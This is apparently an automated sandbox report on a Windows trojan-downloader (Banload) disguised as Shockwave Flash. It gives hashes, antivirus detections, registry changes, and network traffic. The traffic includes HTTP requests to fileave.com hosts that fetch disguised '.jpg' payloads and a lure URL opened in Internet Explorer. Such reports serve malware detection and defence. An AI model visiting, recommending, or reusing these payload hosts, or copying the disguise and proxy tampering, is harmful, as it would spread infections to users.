Analysis Date: 2015-01-25 20:19:45
MD5: 83b82974fc1734eb3d384553206d59fc
SHA1: fa0b8b522abc3c323349c01fbf5131a318edd566

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section CODE: md5: e8515e441d0c0468931059eaf697cd80 sha1: 3312f807ba6ec58172c417406004eedc3026e56c size: 18432
Section .rsrc: md5: 53092036ad76b2be491d0027a0c3b038 sha1: 44929669dc4e6dd41e076144fbaec42ef01fc889 size: 9728
Section .ccp3p: md5: 6bdabac418f7fdc333cd8efedc5c6f3e sha1: 56eb57821e1dbcb93c1fbe67729579e3f47a0b40 size: 1024
Timestamp: 1992-06-19 22:22:17
Version: LegalCopyright: Shockwave Flash 3.0 r8
InternalName: Shockwave Flash 3.0 r8
FileVersion: 1.0.0.0
CompanyName: Shockwave Flash 3.0 r8
SpecialBuild:
LegalTrademarks: Shockwave Flash 3.0 r8
Comments: Shockwave Flash 3.0 r8
ProductName: Shockwave Flash 3.0 r8
ProductVersion: 1.0.0.0
FileDescription: Shockwave Flash 3.0 r8
OriginalFilename: Shockwave Flash 3.0 r8
Packer: CRYPToCRACk's PE Protector V0.9.2 -> Lukas Fleischer
PEhash: a3590f41b7995ce34455604dc0e5a5c1164bc02a
IMPhash: eee9062b8cbe1efb89c250150605b1a4
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Trojan.Heur.bm1@rPVsOImG
AV Alwil (avast): Crypt-DDI [Trj]
AV Arcabit (arcavir): Gen:Trojan.Heur.bm1@rPVsOImG
AV Authentium: W32/Downloader.CDKC-5666
AV Avira (antivir): TR/Spy.Banker.Gen
AV BullGuard: Gen:Trojan.Heur.bm1@rPVsOImG
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): TrojanDownloader.Banload.r3
AV ClamAV: Trojan.Crypted-10
AV Dr. Web: Trojan.DownLoader.20028
AV Emsisoft: Gen:Trojan.Heur.bm1@rPVsOImG
AV Eset (nod32): no_virus
AV Fortinet: W32/Banload.OIS!tr.dldr
AV Frisk (f-prot): W32/Downldr2.DOG
AV F-Secure: Gen:Trojan.Heur.bm1@rPVsOImG
AV Grisoft (avg): Packed.CryptoCrack
AV Ikarus: Trojan-Spy.Win32.Banker.anv
AV K7: Trojan-Downloader ( 00368fc61 )
AV Kaspersky: Trojan-Downloader.Win32.Banload.ois
AV MalwareBytes: no_virus
AV Mcafee: no_virus
AV Microsoft Security Essentials: TrojanDownloader:Win32/Small.gen!AO
AV MicroWorld (escan): Gen:Trojan.Heur.bm1@rPVsOImG
AV Rising: Trojan.DL.Win32.Undef.qef
AV Sophos: Mal/Behav-103
AV Symantec: Packed.Generic.48
AV Trend Micro: TROJ_DELF.YX
AV VirusBlokAda (vba32): Trojan-Downloader.Win32.Small.102210

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\\arquivos de programas\internet explorer\iexplore.exe http://paularmstrongdesigns.com/photos/photos/rave.jpg
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: atoalisa2.fileave.com
Winsock DNS: atoalisa3.fileave.com
Winsock DNS: atoalisa1.fileave.com

Process
↳ C:\\arquivos de programas\internet explorer\iexplore.exe http://paularmstrongdesigns.com/photos/photos/rave.jpg

Network Details:

DNS: atoalisa3.fileave.com Type: A ➝ 208.73.211.167
DNS: atoalisa3.fileave.com Type: A ➝ 208.73.211.244
DNS: atoalisa3.fileave.com Type: A ➝ 208.73.211.250
DNS: atoalisa3.fileave.com Type: A ➝ 208.73.210.211
DNS: atoalisa2.fileave.com Type: A ➝ 208.73.211.199
DNS: atoalisa2.fileave.com Type: A ➝ 208.73.210.204
DNS: atoalisa2.fileave.com Type: A ➝ 208.73.210.210
DNS: atoalisa2.fileave.com Type: A ➝ 208.73.211.179
DNS: atoalisa1.fileave.com Type: A ➝ 208.73.211.167
DNS: atoalisa1.fileave.com Type: A ➝ 208.73.211.244
DNS: atoalisa1.fileave.com Type: A ➝ 208.73.211.250
DNS: atoalisa1.fileave.com Type: A ➝ 208.73.210.211
HTTP GET: http://atoalisa3.fileave.com/modelo3.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://atoalisa2.fileave.com/modelo2.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://atoalisa1.fileave.com/modelo1.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 208.73.211.167:80
Flows TCP: 192.168.1.1:1033 ➝ 208.73.211.199:80
Flows TCP: 192.168.1.1:1034 ➝ 208.73.211.167:80

Raw Pcap
0x00000000 (00000)   47455420 2f6d6f64 656c6f33 2e6a7067   GET /modelo3.jpg
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2061 746f616c 69736133   .Host: atoalisa3
0x000000b0 (00176)   2e66696c 65617665 2e636f6d 0d0a436f   .fileave.com..Co
0x000000c0 (00192)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000d0 (00208)   6c697665 0d0a0d0a                     live....

0x00000000 (00000)   47455420 2f6d6f64 656c6f32 2e6a7067   GET /modelo2.jpg
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2061 746f616c 69736132   .Host: atoalisa2
0x000000b0 (00176)   2e66696c 65617665 2e636f6d 0d0a436f   .fileave.com..Co
0x000000c0 (00192)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000d0 (00208)   6c697665 0d0a0d0a                     live....

0x00000000 (00000)   47455420 2f6d6f64 656c6f31 2e6a7067   GET /modelo1.jpg
0x00000010 (00016)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000020 (00032)   743a202a 2f2a0d0a 41636365 70742d45   t: */*..Accept-E
0x00000030 (00048)   6e636f64 696e673a 20677a69 702c2064   ncoding: gzip, d
0x00000040 (00064)   65666c61 74650d0a 55736572 2d416765   eflate..User-Age
0x00000050 (00080)   6e743a20 4d6f7a69 6c6c612f 342e3020   nt: Mozilla/4.0 
0x00000060 (00096)   28636f6d 70617469 626c653b 204d5349   (compatible; MSI
0x00000070 (00112)   4520362e 303b2057 696e646f 7773204e   E 6.0; Windows N
0x00000080 (00128)   5420352e 313b2053 56313b20 2e4e4554   T 5.1; SV1; .NET
0x00000090 (00144)   20434c52 20322e30 2e353037 3237290d    CLR 2.0.50727).
0x000000a0 (00160)   0a486f73 743a2061 746f616c 69736131   .Host: atoalisa1
0x000000b0 (00176)   2e66696c 65617665 2e636f6d 0d0a436f   .fileave.com..Co
0x000000c0 (00192)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x000000d0 (00208)   6c697665 0d0a0d0a                     live....
Strings
..O
H
.

041604E4
1.0.0.0
1s%P
bsJP2
Comments
CompanyName
DVCLAL
FileDescription
FileVersion
InternalName
Js2P
LegalCopyright
LegalTrademarks
MAINICON
OriginalFilename
PACKAGEINFO
ProductName
ProductVersion
Shockwave Flash 3.0 r8
SpecialBuild
ssPP
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
           
,########"""""
"$$$$$$$$$##
((((''%%%$$%%%%%'(
((((((('%%%%%%%%''(
$%%$$$$$$$$
$%%%$$$$$$
$%%%%$$$$$
######
%$$$$%%$$
															
																								
1"rFdd
3	O&75
"3 :^{S,
))44(((''''%%%%'''(
)_4rQs
5TscjikN
6T	fhx
9Kl9I)
9x%nCgp
a"Ds-fZ
advapi32.dll
and?p=Opx
*AS\~^S
.ccp3p
?.ccpt/
%DS<L`
D	tT!]
eC{]f+
?.edatG
EJ(UbQ
?ExitP
FatalExit
F+DLqs
ffqt7}
#G<qWd
hALY|u
^#H\bO!
(jHB	&q_
-/{:}k-6G}
kernel32.dll
+K&j@BdQ
	ljpW(
lQX+}|=
ly>fO>
msvb]f
%	N%N#j
oleaut32.dll
 oLSUK@{
p,7 T~
Q1NF95L
"#"``qFm
([Q"	h
qs;q~M
?rsrct7
?.rsrt?
SKE5MN
This program must be run under Win32
tiiiiuv
tttt															t
ttttttt											t
tttttttttttttt
/&tV/;LT
Ubs=D^*
URLMON.DLL
user32.dll
USQWVR
*	W''cK
w_PEAq5x
yr66!]
Z)#aNT
|Zie[gL
Z^_Y[]